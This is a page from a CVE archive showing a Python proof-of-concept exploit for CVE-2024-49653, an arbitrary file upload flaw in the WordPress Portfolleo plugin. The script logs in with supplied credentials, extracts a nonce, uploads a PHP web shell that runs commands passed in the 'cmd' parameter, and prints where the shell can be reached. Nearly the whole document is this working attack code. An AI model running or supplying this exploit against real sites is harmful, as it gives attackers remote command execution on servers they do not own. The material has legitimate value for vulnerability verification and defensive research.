4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-49653
README.md
Rendering markdown...
POC / CVE-2024-49653.py PY
⬇ Raw GitHub ✕ Close 
import requests
import time
import argparse
from bs4 import BeautifulSoup

# Banner
banner = """
 @@@@@@@  @@@  @@@  @@@@@@@@          @@@@@@    @@@@@@@@    @@@@@@     @@@                  @@@   @@@@@@     @@@@@@  @@@@@@@  @@@@@@   
@@@@@@@@  @@@  @@@  @@@@@@@@         @@@@@@@@  @@@@@@@@@@  @@@@@@@@   @@@@                 @@@@  @@@@@@@@   @@@@@@@  @@@@@@@  @@@@@@@  
!@@       @@!  @@@  @@!                   @@@  @@!   @@@@       @@@  @@!@!                @@!@!  @@!  @@@  !@@       !@@          @@@  
!@!       !@!  @!@  !@!                  @!@   !@!  @!@!@      @!@  !@!!@!               !@!!@!  !@!  @!@  !@!       !@!          @!@  
!@!       @!@  !@!  @!!!:!  @!@!@!@!@   !!@    @!@ @! !@!     !!@  @!! @!!  @!@!@!@!@   @!! @!!  !!@!!@!!  !!@@!@!   !!@@!!   @!@!!@   
!!!       !@!  !!!  !!!!!:  !!!@!@!!!  !!:     !@!!!  !!!    !!:  !!!  !@!  !!!@!@!!!  !!!  !@!    !!@!!!  @!!@!!!!  @!!@!!!  !!@!@!   
:!!       :!:  !!:  !!:               !:!      !!:!   !!!   !:!   :!!:!:!!:            :!!:!:!!:      !!!  !:!  !:!      !:!      !!:  
:!:        ::!!:!   :!:              :!:       :!:    !:!  :!:    !:::!!:::            !:::!!:::      !:!  :!:  !:!      !:!      :!:  
 ::: :::    ::::     :: ::::         :: :::::  ::::::: ::  :: :::::    :::                  :::  ::::: ::  :::: :::  :::: ::  :: ::::  
 :: :: :     :      : :: ::          :: : :::   : : :  :   :: : :::    :::                  :::   : :  :    :: : :   :: : :    : : :
                   By:Nxploited | Khaled Alenazi,
"""

print(banner)

def parse_arguments():
    parser = argparse.ArgumentParser(description="WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi")
    parser.add_argument('-u', '--url', required=True, help='Base URL of the site (e.g. http://192.168.100.74:888/wordpress)')
    parser.add_argument('-U', '--username', dest='username', required=True, help='WordPress username')
    parser.add_argument('-p', '--password', required=True, help='WordPress password')
    return parser.parse_args()

def create_session():
    session = requests.Session()
    requests.packages.urllib3.disable_warnings()
    session.verify = False
    return session

def login(session, url, username, password):
    login_url = f"{url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    response = session.post(login_url, data=login_data, headers={"User-Agent": "Mozilla/5.0"})
    return response

def check_login(session):
    return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)

def get_nonce(session, url, portfolio_path):
    portfolio_url = f"{url}/{portfolio_path}"
    response = session.get(portfolio_url, headers={"User-Agent": "Mozilla/5.0"})
    soup = BeautifulSoup(response.text, 'html.parser')
    return soup.find('input', {'name': '_wpnonce'})['value']

def upload_shell(session, url, nonce, portfolio_path):
    shell_file = {
        'fileupload': ('nxploit.php', '<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>', 'application/x-php')
    }
    form_data = {
        '_wpnonce': nonce,
        '_wp_http_referer': f'/{portfolio_path}',
        'name': 'profile',
        'dob': '23/03/2025',
        'desc': 'Im Nxploited , Khaled Alenazi',
        'action': 'update',
        'page_options': 'name,dob,desc,datafile',
        'submit': 'Add To Portfolio'
    }
    upload_url = f"{url}/wp-admin/options.php"
    response = session.post(upload_url, headers={"User-Agent": "Mozilla/5.0"}, files=shell_file, data=form_data)
    return response

def main():
    args = parse_arguments()
    session = create_session()
    
    response = login(session, args.url, args.username, args.password)
    if check_login(session):
        print("[+] Logged in successfully.")
    else:
        print("[-] Failed to log in.")
        exit()

    portfolio_path = "wp-admin/admin.php?page=portfolleo"
    nonce = get_nonce(session, args.url, portfolio_path)
    print(f"[+] Extracted _wpnonce: {nonce}")

    response = upload_shell(session, args.url, nonce, portfolio_path)
    print("[+] Shell has been uploaded.")
    print("[*] Check the shell here: {}/wp-content/portfolleo/nxploit.php".format(args.url))

if __name__ == "__main__":
    main()